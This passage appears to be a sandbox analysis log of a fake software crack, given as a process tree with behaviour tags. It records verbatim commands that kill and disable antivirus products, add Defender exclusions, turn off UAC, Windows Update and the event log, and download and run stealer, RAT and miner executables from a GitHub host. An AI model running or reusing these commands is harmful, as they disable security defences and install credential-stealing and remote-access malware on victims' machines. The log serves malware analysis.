    taskkill /F /IM tmproxy.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4656
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM pccntmon.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3620
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM tmlisten.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:344
- - C:\Windows\system32\sc.exe
    sc stop TmProxy
    3⤵
    - Launches sc.exe
    PID:4600
- - C:\Windows\system32\sc.exe
    sc config TmProxy start= disabled
    3⤵
    - Launches sc.exe
    PID:2812
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM mbam.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2236
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM mbamservice.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5768
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM mbamtray.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4764
- - C:\Windows\system32\sc.exe
    sc stop MBAMService
    3⤵
    - Launches sc.exe
    PID:4908
- - C:\Windows\system32\sc.exe
    sc config MBAMService start= disabled
    3⤵
    - Launches sc.exe
    PID:4948
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM cis.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4812
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM cfp.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1500
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM cmdagent.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3920
- - C:\Windows\system32\sc.exe
    sc stop CmdAgent
    3⤵
    - Launches sc.exe
    PID:1472
- - C:\Windows\system32\sc.exe
    sc config CmdAgent start= disabled
    3⤵
    - Launches sc.exe
    PID:4896
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM sophosav.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5720
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM savservice.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5664
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM sophoshealth.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5876
- - C:\Windows\system32\sc.exe
    sc stop "Sophos AV"
    3⤵
    - Launches sc.exe
    PID:1756
- - C:\Windows\system32\sc.exe
    sc config "Sophos AV" start= disabled
    3⤵
    - Launches sc.exe
    PID:1992
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM psanhost.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4552
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM pavsrv.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3300
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM psimsvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2052
- - C:\Windows\system32\sc.exe
    sc stop PandaSecurity
    3⤵
    - Launches sc.exe
    PID:1816
- - C:\Windows\system32\sc.exe
    sc config PandaSecurity start= disabled
    3⤵
    - Launches sc.exe
    PID:1780
- - C:\Windows\system32\fltMC.exe
    fltmc unload kl1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5128
- - C:\Windows\system32\fltMC.exe
    fltmc unload bdsvm
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5196
- - C:\Windows\system32\fltMC.exe
    fltmc unload aswSP
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:320
- - C:\Windows\system32\fltMC.exe
    fltmc unload avgmfx86
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2872
- - C:\Windows\system32\fltMC.exe
    fltmc unload tmcomm
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2324
- - C:\Windows\system32\fltMC.exe
    fltmc unload mbamswissarmy
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4500
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Services\kl1" /v Start /t REG_DWORD /d 4 /f
    3⤵
    PID:2804
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Services\bdsvm" /v Start /t REG_DWORD /d 4 /f
    3⤵
    PID:4164
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Services\aswSP" /v Start /t REG_DWORD /d 4 /f
    3⤵
    PID:1432
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Services\avgmfx86" /v Start /t REG_DWORD /d 4 /f
    3⤵
    PID:3672
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Services\tmcomm" /v Start /t REG_DWORD /d 4 /f
    3⤵
    PID:2728
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Services\mbamswissarmy" /v Start /t REG_DWORD /d 4 /f
    3⤵
    PID:3748
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "CrackTask" /tr "C:\ProgramData\Crack\Launcher.exe" /sc once /st 00:00 /ru SYSTEM /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4276
- - C:\Windows\system32\schtasks.exe
    schtasks /run /tn "CrackTask"
    3⤵
    PID:2940
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "CrackTask" /f
    3⤵
    PID:3796
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest 'https://github.com/seven7174o/ABUZA-GAY/raw/refs/heads/main/GRABBER.exe' -OutFile 'Launcher.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5508
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\ProgramData\Crack\Launcher.exe" /s /d
    3⤵
    - Views/modifies file attributes
    PID:2920
- - C:\ProgramData\Crack\Launcher.exe
    Launcher.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:5176
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest 'https://github.com/seven7174o/ABUZA-GAY/raw/refs/heads/main/STEALER.exe' -OutFile 'start.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5816
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\ProgramData\Crack\start.exe" /s /d
    3⤵
    - Views/modifies file attributes
    PID:4320
- - C:\ProgramData\Crack\start.exe
    start.exe
    3⤵
    - Executes dropped EXE
    - Checks for VirtualBox DLLs, possible anti-VM trick
    PID:2648
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest 'https://github.com/seven7174o/ABUZA-GAY/raw/refs/heads/main/RAT.exe' -OutFile 'explorer.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5388
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\ProgramData\Crack\explorer.exe" /s /d
    3⤵
    - Views/modifies file attributes
    PID:5796
- - C:\ProgramData\Crack\explorer.exe
    explorer.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3528
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest 'https://github.com/seven7174o/ABUZA-GAY/raw/refs/heads/main/MINER.exe' -OutFile 'explorerS.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3488
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\ProgramData\Crack\explorerS.exe" /s /d
    3⤵
    - Views/modifies file attributes
    PID:5476
- - C:\ProgramData\Crack\explorerS.exe
    explorerS.exe
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4464
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4660
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:2800
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:748
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:4284
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:1596
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:1908
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:2604
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:5684
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:5236
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2072
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:4652
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:1816
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3712
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "explorer"
      4⤵
      Launches sc.exe
      PID:5196
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "explorer" binpath= "C:\ProgramData\Windows\explorer.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:5788
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:888
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "explorer"
      4⤵
      Launches sc.exe
      PID:3044
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2748
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:6016
- - C:\Windows\system32\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:6056
- - C:\Windows\system32\cscript.exe
    cscript //nologo temp.vbs
    3⤵
    PID:400
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4912
- - C:\Windows\system32\PING.EXE
    ping -n 4 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4864
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://t.me/StopCrashingsBot?start=CHEATCRACK"
    3⤵
    PID:4900
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch https://t.me/StopCrashingsBot?start=CHEATCRACK
      4⤵
      Drops file in Program Files directory
      Checks processor information in registry
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Modifies registry class
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:4164
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x258,0x25c,0x260,0x254,0x2f4,0x7ffc460ef208,0x7ffc460ef214,0x7ffc460ef220
        5⤵
        
        PID:4572
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1924,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=308 /prefetch:3
        5⤵
        
        PID:5880
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2296,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=2288 /prefetch:2
        5⤵
        
        PID:3892
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2512,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=3148 /prefetch:8
        5⤵
        
        PID:4568
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3408,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=3416 /prefetch:1
        5⤵
        
        PID:3516
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3420,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=3448 /prefetch:1
        5⤵
        
        PID:5816
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4884,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=4896 /prefetch:1
        5⤵
        
        PID:4896
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5156,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5192 /prefetch:8
        5⤵
        
        PID:3580
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5180,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5212 /prefetch:8
        5⤵
        
        PID:2372
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5528,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5372 /prefetch:8
        5⤵
        
        PID:5484
    - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5736,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6076 /prefetch:8
        5⤵
        
        PID:3908
    - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5736,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6076 /prefetch:8
        5⤵
        
        PID:2212
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3436,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5616 /prefetch:8
        5⤵
        
        PID:724
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5872,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=3464 /prefetch:8
        5⤵
        
        PID:920
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5832,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6336 /prefetch:8
        5⤵
        
        PID:1744
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5888,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6384 /prefetch:8
        5⤵
        
        PID:3372
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5860,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6388 /prefetch:8
        5⤵
        
        PID:3420
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5220,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5308 /prefetch:8
        5⤵
        
        PID:3400
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5900,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6484 /prefetch:8
        5⤵
        
        PID:5884
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5160,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=2688 /prefetch:8
        5⤵
        
        PID:728
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6536,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=2692 /prefetch:8
        5⤵
        
        PID:4840
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6392,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5388 /prefetch:8
        5⤵
        
        PID:2176
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5392,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5432 /prefetch:8
        5⤵
        
        PID:2160
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5212,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6424 /prefetch:8
        5⤵
        
        PID:6104
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6484,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:8
        5⤵
        
        PID:2656
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6360,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5200 /prefetch:8
        5⤵
        
        PID:3912
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6396,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6408 /prefetch:8
        5⤵
        
        PID:3636
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6096,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5856 /prefetch:8
        5⤵
        
        PID:5156
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6340,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6372 /prefetch:8
        5⤵
        
        PID:1744
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6292,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=820 /prefetch:8
        5⤵
        
        PID:8144
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=6348,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=820 /prefetch:8
        5⤵
        
        PID:6272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
  2⤵
  PID:1732
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:5440
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
    3⤵
    PID:5060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3556

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3740

